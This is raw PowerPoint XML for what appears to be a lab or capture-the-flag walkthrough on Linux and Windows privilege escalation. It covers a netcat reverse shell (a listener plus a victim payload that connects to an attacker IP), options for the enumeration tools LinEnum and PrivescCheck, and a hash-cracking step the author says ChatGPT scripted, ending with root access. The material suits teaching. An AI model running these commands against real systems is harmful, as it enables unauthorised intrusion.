          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="359375377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229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9" grpId="0">
        <p:bldAsOne/>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8DC4E9-7062-C5C3-BD22-BFB0AFCA542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2B449202-BAD4-0F28-2EC7-34F7EE073D7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445991" y="640823"/>
            <a:ext cx="3604801" cy="5583148"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Reverse shell</a:t>
            </a:r>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system&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{967C0D1F-2B7B-6214-181C-F6F4DDA71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433" y="630936"/>
            <a:ext cx="6894576" cy="3343869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8192F913-6145-D49B-D567-0BD6B6A89A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654295" y="4129549"/>
            <a:ext cx="7424633" cy="2097516"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Listener command : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>lvnp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t> &lt;port-number-of-victim&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="SFMono-Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>l -&gt; listener , v -&gt; verbose , n -&gt; do not use DNS , p -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>port specification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Payload (victim ) : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>-of-attacker&gt; &lt;port-number-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>of-victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24901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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30"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637F45-4EA7-ED16-D78F-5DAF4B3F3D6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98A855A5-D13A-0E49-BA2B-34513A6DEBDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="639520"/>
            <a:ext cx="3429000" cy="1719072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1"/>
              <a:t>LinEnum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0"/>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E6207BC1-A115-C11B-405B-BCBC9CB9FF4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630935" y="2807208"/>
            <a:ext cx="3665293" cy="3916830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tool that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="__Inter_d65c78"/>
              </a:rPr>
              <a:t>automates the process of enumerating various aspects of the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>./LinEnum.sh –r –t –d –k –n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>r -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>root permission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>t -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>target specific user </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>d -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>dump all user information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>k -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kernal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>n -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>network interface information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 4" descr="A screen shot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E9E5EF-AFEA-224F-50E2-39C267784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1769" y="2358592"/>
            <a:ext cx="6903720" cy="4183577"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393806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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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4" end="4"/>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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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5">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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6"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EE0187-3F4A-86E1-73D9-9A151D50A7BF}"/>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B8D7487-32A1-BF71-41C2-008D84AFCB5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="640080"/>
            <a:ext cx="4818888" cy="1481328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5000" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="__Inter_d65c78"/>
              </a:rPr>
              <a:t>PrivescCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5000" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="__Inter_d65c78"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="__Inter_d65c78"/>
              </a:rPr>
              <a:t>Windows)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5000" dirty="0"/>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11737880-C249-F72D-4E87-0BA5B937E549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2660904"/>
            <a:ext cx="4818888" cy="3547872"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tool that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="__Inter_d65c78"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="__Inter_d65c78"/>
              </a:rPr>
              <a:t>dentifies and exploits vulnerabilities that allow an attacker to elevate their privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="__Inter_d65c78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="__Inter_d65c78"/>
              </a:rPr>
              <a:t>Python privesc-check.py –t –d –k –n </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="__Inter_d65c78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>t -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>target specific user </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>d -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>dump all user information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>k -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kernal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>n -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>network interface information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 6" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5EB5EFA-CE59-8996-575E-9733D726EC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8315" y="1921632"/>
            <a:ext cx="6065194" cy="4490344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230645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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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4" end="4"/>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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30"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5">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>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
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35"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6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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41"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B979244-9367-8000-AD03-366B5C8F2760}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 4" descr="A screenshot of a computer program&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9704E4-0993-9E9A-F1CC-8C027F747A91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="3534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9ECD24E-027C-E19D-EE6E-3C04905323C8}"/>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chemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>INSTANT Machine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22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3A6D2A2-AAEF-1183-48C8-B5067105DA41}"/>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0F1EF-964D-EA2A-EB51-24C53C1FADEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340649" y="301752"/>
            <a:ext cx="6640721" cy="1481328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t>privilege escalation by brute force</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456D20-AEAE-7350-33C7-B3EDCA299BC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237554" y="2770160"/>
            <a:ext cx="4818888" cy="3547872"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> I asked ChatGPT to make a simple script to make take a list of passwords then give it to the tool and the tool try to crack the hash with it and give a response back.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen shot of a program code&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F64532-304F-170B-2A0C-C4584E902CCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5293996" y="2084832"/>
            <a:ext cx="6622332" cy="3890618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19031074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FB83F4-B2C5-ACEA-D261-C3F128234C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13DC96-CAB7-EAA4-0FFE-0C39A51F6FB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="640080"/>
            <a:ext cx="4818888" cy="1481328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0"/>
              <a:t>At The End</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98ABB1-DBE3-3FA1-1BAD-F255FBDF5FD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2660904"/>
            <a:ext cx="4818888" cy="3547872"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>After that I was able to get the credentials of the root user and sign in as root.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen shot of yellow text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ED98CEF-7AD3-55E5-E495-A1D4F7CF1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6134" y="640080"/>
            <a:ext cx="4284795" cy="5577840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
